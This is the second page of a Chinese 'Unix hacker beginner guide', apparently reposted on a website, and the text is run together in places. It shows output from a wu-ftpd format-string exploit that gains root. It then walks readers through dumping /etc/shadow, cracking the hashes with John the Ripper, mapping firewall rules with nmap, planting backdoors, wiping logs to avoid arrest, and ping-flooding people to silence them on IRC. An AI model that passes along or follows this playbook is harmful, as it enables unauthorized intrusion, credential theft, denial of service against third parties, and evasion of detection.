| unix黑客初学指导 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-24 0:07:35
|
| m rpm4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages$ ./wuftpd-god -s0 -t target.domainTarget: target.domain (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpmReturn Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152loggin into system..[32mUSER ftp[0m331 Guest login ok, send your complete e-mail address as password.[32mPASS[0m230-Next time please use your e-mail address as your password230- for example: joe@cc456375-b.abdn1.md.home.com230 Guest login ok, access restrictions apply.STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]STEP 3 : Checking if we can reach our return address by format stringLinux melmac 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknownuid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)#如果你想要root的话,exploit是一种方法。查出系统的操作系统,然后到hack.co.za 或者packetstorm 查找那个系统的exploit,你应当得到一些perl scripts/c scripts/shell scripts。执行它们,你就会成为root当然,如果系统打了exploit的补丁,你或许想知道root的口令是什么。可以敲下面的命令:(如果没有经过shadow,口令被存放于/etc/passwd)# cat /etc/shadow > /root/passwdroot:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:daemon:x:2:2:daemon:/sbin:adm:x:3:4:adm:/var/adm:lp:x:4:7:lp:/var/spool/lpd:sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:uucp:x:10:14:uucp:/var/spool/uucp:operator:x:11:0:operator:/root:games:x:12:100:games:/usr/games:sympa:x:89:89:Sympa Mailing list manager:/home/sympa:/bin/bashgopher:x:13:30:gopher:/usr/lib/gopher-data:ftp:x:14:50:FTP User:/home/ftp:nobody:x:99:99:Nobody:/:xfs:x:100:103:X Font Server:/etc/X11/fs:/bin/falsefax:x:10:14:Fax Master:/home/fax/:/bin/bashpostfix:x:101:233:postfix:/var/spool/postfix:gdmicon_mad.gif:42:235::/home/gdm:/bin/bashgrim:9hu.u8:501:501:grim:/home/grim:/bin/bashbanal:x:102:236:BANAL Administrator:/home/banal:/bin/bashbleeb:36.34/363;86:502:506::/home/bleeb:/bin/bash上面就是/etc/passwd的内容,但是你需要破解他们,可以用john the ripper,可以在packetstorm或其他地方找到它。我就用它,他很快。(snowbue:支持国产,你可以用小榕的 乱刀可以在在www.netxeyes.com 下载)有时破解一个账号要用几年的时间,所以我并不提倡这种做法。防火墙:8. 如果你了解你所作的,防火墙并不能阻止你。我很喜欢用nmap,这个工具非常好。在www.insecure.org 可以找到最新的版本。我喜欢它的OS(操作系统)检测,即使目标只运行了很少的服务,它的检测也很准确。它通过分析目标的tcp指纹并于自身携带的数据库作比较来得到结果。下面给出一个使用nmap来查出防火墙规则的例子。敲入nmap –sA 。浙江检测防火墙的规则。我不想太过深入而是这篇文章变得使人厌烦。如果你像知道更多有关nmap的,只需敲入man nmap就可以了。进入以后做什么:9. 进入以后做什么取决于你想如何使用这个系统。如果你想有一个匿名的root shell,那么就设置一个后门。你可以在www.packetstorm.securify.com 找到后门(木马)。我认为你完全有能力自己独立设置一个后门,但是如果你需要帮助的话,加入$r00t-access,或许我可以帮助你。但是我*不会*帮助你进入一个系统,不过我或许可以帮助你加固你自己的系统。如何才能不被抓住:10. 最主要的事是。别干*蠢*事。如果你想保住那个shell,不要破坏那个系统,不要删除他们的文件,不过或许你需要修改他们的纪录。这就是我想说的。清除纪录:11.如果你还向待在这儿而不进监狱的话,清除日志是最重要的工作。在login/hostname中清除纪录,linux里是/var/log,还有你目录下的.bash_profile文件。作这事的最简单的方法是到blackcode.com 或packetstorm找一个工具。用途:12. 我一向都拥有超过一个root shell。我在那上面运行nmap和saint来隐藏我自己的主机。或许我会在那上面设置一个web proxy/bnc。Saint是一个很好的工具。它可以告诉你系统有些什么漏洞。你可以在远程很容易的使用它。有时当我看不惯某人的时候,我就flood他们,就像这样:# ping -f -c 50 -s 4500 IPaddress.............................................................................................................................E...........E...EE........E..................E.....................E.......E.EEE...................E.E......Host unreatchable.有人认为这是lame的,但是我通过这样来让某人在IRC里闭嘴。破坏者:13.在这篇文章中我没有谈到hacking,实际上我我所涉及的只是cracking,我并不破坏系统,可能永远都不会。并不是我没有这个能力而是因为这是不对的。再加上如果你被抓住了你或许会因为你的破坏而坐几年牢。我不喜欢人们把hacking和cracking混为一谈 上一页 [1] [2]
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: GNU通用公共许可证(GPL)
下一篇文章: nis + autofs + nfs |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)